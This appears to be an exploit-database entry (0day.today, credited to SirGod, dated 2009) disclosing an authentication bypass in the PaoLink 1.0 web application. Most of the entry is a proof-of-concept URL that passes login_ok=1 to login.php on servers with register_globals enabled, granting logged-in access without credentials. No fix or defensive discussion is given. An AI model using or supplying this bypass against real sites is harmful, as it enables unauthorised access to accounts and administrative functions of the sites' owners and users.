id: 5571
date: 07/27/2009
title: PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability
author: SirGod
cves: 

==========================================================
PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability
==========================================================


#############################################################################
[+] PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability
[+] Discovered By SirGod
#############################################################################

download : http://zenas.org/paobacheca/download/scarica.html

[+] Authentication Bypass Vulnerability


 - Notes : register_globals = on


 - PoC :

     http://127.0.0.1/[path]/login.php?login_ok=1

#############################################################################



#  0day.today [2023-03-25]  #